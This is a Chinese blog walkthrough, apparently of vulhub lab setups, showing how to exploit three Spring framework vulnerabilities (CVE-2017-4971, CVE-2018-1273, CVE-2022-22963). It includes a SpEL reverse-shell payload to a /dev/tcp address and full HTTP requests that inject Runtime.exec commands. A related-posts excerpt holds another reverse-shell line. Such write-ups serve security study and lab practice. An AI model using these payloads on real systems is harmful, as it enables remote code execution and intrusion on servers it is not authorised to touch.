Spring框架漏洞

已于 2023-12-17 10:26:55 修改
阅读量1.3k 收藏 30
点赞数 25
文章标签: spring java 后端 网络安全 web安全 安全
于 2023-12-11 10:08:15 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_68408599/article/details/134919398
版权

目录

1、CVE-2017-4971

触发漏洞的条件

1.1.登陆

1.2:访问存在漏洞的页面

1.3.漏洞利用

2、CVE-2018-1273(远程命令执行漏洞)(SPEL表达式注入漏洞)

漏洞利用条件和方式

2.1.信息收集

2.2.攻击利用

2.3.漏洞验证

3、CVE-2022-22963(SPEL命令表达式注入漏洞)

漏洞原理

3.1.使用服务器发送以下数据

3.2.攻击利用

3.3.漏洞验证

以下框架漏洞均为Spring的框架,博主将从漏洞原理以及漏洞利用上来讲解,代码层面来讲解可能需要后面一段时间,本篇章的框架漏洞也暂此告一段落了,后面也会更新新的内容知识。以下所有靶场均来自vulhub(肥肠好用,重点是免费)

1、CVE-2017-4971

触发漏洞的条件

由上我们知道了有这两个条件才能触发漏洞:

1.在 webflow 配置文件中 view-state 节点中指定了 model 属性,并且没有指定绑定的参数,即 view-state 中没有配置 binder 节点

2.而且 MvcViewFactoryCreator 类中 useSpringBeanBinding 默认值(false)未修改

(如果默认值被修改则执行不了表达式)

参考链接  

1.1.登陆

首先访问/login页面,输入账号密码

9c08f0401b7645d38db94764b3141b9b.png

1.2:访问存在漏洞的页面

然后访问id为1的酒店http://your-ip:8080/hotels/1,点击预订按钮“Book Hotel”,填写相关信息后点击“Proceed”(从这一步,其实WebFlow就正式开始了):

f1afc2fef6a1441dadc15f14ce4b9ddb.png

1.3.漏洞利用

修改数据包内容,对抓包的数据增加以下内容(反弹shell)记得url编码

_(new java.lang.ProcessBuilder("bash","-c","bash -i >& /dev/tcp/10.0.0.1/21 0>&1")).start()=vulhub

 

6ee292b545f1d11d0fd3415b0fa29d3e.png

2、CVE-2018-1273(远程命令执行漏洞)(SPEL表达式注入漏洞)

参考链接

Spring Data是一个用于简化数据库访问,并支持云服务的开源框架,Spring Data Commons是Spring Data下所有子项目共享的基础框架。Spring Data Commons 在2.0.5及以前版本中,存在一处SpEL表达式注入漏洞,攻击者可以注入恶意SpEL表达式以执行任意命令。

 

反弹shell方法:创建一个文件写有反弹shell代码,让其远程访问并下载

 

漏洞利用条件和方式

确认目标项目中包含Spring-data-commons包和版本范围如下:
Spring Data Commons 1.13 to 113.10
Spring Data Commons 2.0 to 2.0.5


查看相关特性是否已经开启
1.@ EnableSpringDataWebSupport被显示声明
2.@ EnableSprinaDataWebSupport没有显示声明,而是采用了spring-boot样架的自动扫描特性当采用Spring-boot的自动扫描特性的时候,在启动时会自动加载SpringDataWebConfiguration类效果与上述相同
3.在非注解声明项目中,如果有如下声明,也考虑开启了相关的特性


### 漏洞影响范围
Spring Data Commons 1.13至1.13.10 (Ingalls SR10)
Spring Data REST 2.6至2.6.10 (Ingalls SR10)
Spring Data Commons 2.0至2.0.5 (Kay SR5)
Spring Data REST 3.0至3.0.5 (Kay SR5)
较旧的不受支持的版本也会受到影响

2.1.信息收集

搭建容器后,进入users页面可以看到一个用户注册页面

9a2eeafd7d18aec0113967db6e4bae14.png

2.2.攻击利用

抓包修改为以下内容并发送:

POST /users?page=&size=5 HTTP/1.1
Host: localhost:8080
Connection: keep-alive
Content-Length: 124
Pragma: no-cache
Cache-Control: no-cache
Origin: http://localhost:8080
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://localhost:8080/users?page=0&size=5
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8

username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/success")]=&password=&repeatedPassword=

2.3.漏洞验证

进入服务器:docker-compose exec spring bash,查看tmp目录,发现新创建了一个success文件!

 

14ec7182b4980be753d4f39f4a280a21.png

3、CVE-2022-22963(SPEL命令表达式注入漏洞)

漏洞原理

由于Spring CloudFunction中RoutingFunction类的apply方法将请求头中的"spring.cloud.function.routing-expression"参数作为Spel表达式进行处理,造成了Spel表达式注入漏洞,当使用路由功能时,攻击者可利用该漏洞远程执行任意代码。

3.1.使用服务器发送以下数据

curl http://your-ip:8080/uppercase -H "Content-Type: text/plain" --data-binary test

这个请求的作用是将test字符串转换为大写形式,因为请求的路径是/uppercase,这很可能是一个服务器上的API,用于将请求的内容转换为大写形式并返回结果。

3.2.攻击利用

发送以下数据包,spring.cloud.function.routing-expression头中包含的SpEL表达式将会被执行

POST /functionRouter HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("touch /tmp/success")
Content-Type: text/plain
Content-Length: 4

test

3.3.漏洞验证

进入docker容器访问tmp目录发现success文件已经创建

 

5f5636a37feb42fdb0bd1b200ae91f9b.png

 

B10SS0MS
关注
  • 25
    点赞
  • 30
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
spring mvc 参数绑定漏洞
03-20
NULL 博文链接:https://yfm049.iteye.com/blog/860494
网络安全Spring框架漏洞总结(一)
qq_44005305的博客
01-06 283
SpringJava EE编程领域的一个轻量级开源框架,该框架由一个叫Rod Johnson的程序员在2002年最早提出并随后创建,是为了解决企业级编程开发中的复杂性,业务逻辑层和其他各层的松耦合问题,因此它将面向接口的编程思想贯穿整个系统应用,实现敏捷开发的应用型框架框架的主要优势之一就是其分层架构,分层架构允许使用者选择使用哪一个组件,同时为J2EE应用程序开发提供集成的框架
网络安全Spring框架漏洞总结(二)
qq_44005305的博客
01-06 676
Spring Web Flow是Spring的一个子项目,主要目的是解决跨越多个请求的、用户与服务器之间的、有状态交互问题,提供了描述业务流程的抽象能力。Spring WebFlow 是一个适用于开发基于流程的应用程序的框架(如购物逻辑),可以将流程的定义和实现流程行为的类和视图分离开来。在其 2.4.x 版本中,如果我们控制了数据绑定时的field,将导致一个SpEL表达式注入漏洞,最终造成任意命令执行。
Java 框架安全Spring 漏洞序列
最新发布
2401_84969389的博客
05-17 388
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
spring常见漏洞总结
hongduilanjun的博客
07-21 4859
Spring的英文翻译为春天,可以说是给Java程序员带来了春天,因为它极大的简化了开发。得出一个公式Spring=春天=Java程序员的春天=简化开发。最后的简化开发正是Spring框架带来的最大好处。Spring是一个开放源代码的设计层面框架,它是于2003年兴起的一个轻量级的Java开发框架。由RodJohnson创建,其前身为Interface21框架,后改为了Spring并且正式发布。Spring是为了解决企业应用开发的复杂性而创建的。...
Spring框架漏洞合集
小小猪的博客
08-18 7834
Spring框架漏洞合集 Spring Security OAuth2 远程命令执行漏洞(CVE-2016-4977) 访问路径/oauth/authorize,会看到左上角有个绿色叶子的标志,一般都是spring或者springboot 直接打poc,可以看到有el表达式注入的形式 /oauth/authorize?response_type=${2*3}&client_id=acme&scope=openid&redirect_uri=http://test 如果要
spring框架漏洞整理(Springboot漏洞)
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
11-01 4014
2016年爆出的一个漏洞Springboot漏洞利用条件 至少知道一个触发 springboot 默认错误页面的接口及参数名 利用方法 Springboot漏洞步骤一:找到一个正常传参处 比如发现访问/article?id=xxx,页面会报状态码为 500 的错误:Whitelabel Error Page,则后续 payload 都将会在参数 id 处尝试。 Springboot漏洞步骤二:执行 SpEL 表达式
Spring 框架相关漏洞详解合集
zjjcchina的博客
01-19 4190
虽说是 Spring 框架漏洞,但以下包含并不仅 Spring Framework,Spring Boot,还有 Spring Cloud,Spring Data,Spring Security 等。 CVE-2010-1622 Spring Framework class.classLoader 类远程代码执行 影响版本:SpringSource Spring Framework 3.0.0 - 3.0.2、SpringSource Spring Framework 2.5.0 - 2.5.7
spring-framework-5.0.5.RELEASE 漏洞修复
04-11
Spring框架中的spring-messaging模块提供了一种基于WebSocket的STOMP协议实现,STOMP消息代理在处理客户端消息时存在SpEL表达式注入漏洞,因此攻击者可以通过构造恶意的消息来实现远程代码执行。 Windows平台...
Spring渗透合集1
08-03
Spring框架概述】 SpringJava平台上广泛使用的轻量级开源框架,主要针对企业级应用开发中的复杂性问题,尤其在业务逻辑层和其他层次之间提供了松耦合的解决方案。Spring的核心特性包括依赖注入(Dependency ...
漏洞分析1
08-03
在本文中,我们将深入探讨一个名为"Spring-beans RCE漏洞分析1"的安全问题,它涉及到Spring框架中的远程代码执行(RCE)风险。这个漏洞主要出现在JDK 9及以上版本,并且与Spring-beans包以及Spring参数绑定机制有关...
Spring framework(cve-2010-1622)漏洞利用指南1
08-08
Spring框架(CVE-2010-1622)漏洞分析与利用探讨》 Spring框架,作为Java领域广泛使用的轻量级应用框架,其安全性一直是开发者关注的重点。2010年出现的CVE-2010-1622漏洞,尽管在当时并未引发大规模的利用,但其...
spring漏洞合集 下
寒星的博客
05-07 5422
前言 现在的 java 开放的网站十个里面有九个是 spring 写的。网上对 spring 相关漏洞的资料很多,但是总结的文章却很少,再加上 spring 庞大的生态,每当看到 spring 相关网站的时候,脑子里虽然零零散散冒出来一堆漏洞,但是却不知道哪些符合当前环境。 因此搜集了所有 spring 相关漏洞,对它们的利用条件和检测方式进行梳理和总结,希望在面对 spring 的时候,能够有一个更完整的思路去发现漏洞。 这里更多是的是的利用条件和检测方式的总结,主要以发现漏洞为目的,至于如何将漏洞效果最
SpringBoot漏洞
热门推荐
weixin_51151498的博客
01-19 1万+
spring漏洞
网传的Spring漏洞,理解透彻
m0_60608008的博客
04-02 338
还有Java核心知识点+全套架构师学习资料和视频+一线大厂面试宝典+面试简历模板可以领取+阿里美团网易腾讯小米爱奇艺快手哔哩哔哩面试题+Spring源码合集+Java架构实战电子书+2021年最新大厂面试题。+一线大厂面试宝典+面试简历模板可以领取+阿里美团网易腾讯小米爱奇艺快手哔哩哔哩面试题+Spring源码合集+Java架构实战电子书+2021年最新大厂面试题。[外链图片转存中…(img-q1BN80V8-1712042901275)]
spring漏洞合集及其poc合集
weixin_46626737的博客
08-21 472
在post请求体中加上_eventId_confirm=&_csrf=4962b53e-b8c7-4290-8fa4-10dd87fd6ead&_(new java.lang.ProcessBuilder("bash","-c","bash+-i+>%26+/dev/tcp/192.168.10.7/2233 +0>%261")).start()=vulhub。1)漏洞原理:Spring Data REST是一个构建在Spring Data之上,为了帮助开发者更加容易地开发REST风格的Web服务。
spring常见漏洞(1)
星星我啊,已经很努力在学习了, 有人一起学习吗?Ziansec-1
01-14 446
Spring Security OAuth RCE(cve-2016-4977),是为Spring框架提供安全认证支持的一个模块,在7月5日其维护者发布了这样一个升级公告,主要说明在用户使用来处理错误时,攻击者在被授权的情况下可以通过构造恶意参数来远程执行命令。漏洞的发现者在10月13日公开了该漏洞的挖掘记录。
SpringBoot历史漏洞复现
weixin_53747497的博客
04-01 5869
Spring框架为开发Java应用程序提供了全面的基础架构支持。它包含一些很好的功能,如依赖注入和开 箱即用的模块,如:Spring JDBC 、Spring MVC 、Spring Security、 Spring AOP 、Spring ORM 、 Spring Test,这些模块缩短应用程序的开发时间,提高了应用开发的效率例如,在Java Web开发的早 期阶段,我们需要编写大量的代码来将记录插入到数据库中。
spring框架漏洞
06-09
Spring框架有一些已知的漏洞,这些漏洞可能会影响应用程序的安全性,主要包括以下几类: 1. 远程代码执行漏洞:攻击者可以利用这种漏洞远程执行恶意代码,从而控制服务器或获取敏感信息。 2. 权限许可和访问控制漏洞:攻击者可以利用这种漏洞绕过应用程序的安全机制,访问未授权的资源或执行未授权的操作。 3. 拒绝服务漏洞:攻击者可以利用这种漏洞通过发送恶意请求或攻击服务器,导致应用程序无法正常工作。 为了保证Spring框架安全性,建议开发人员及时更新框架版本,避免使用过时的版本,以及使用安全的编码实践来防止漏洞的出现。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

B10SS0MS

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值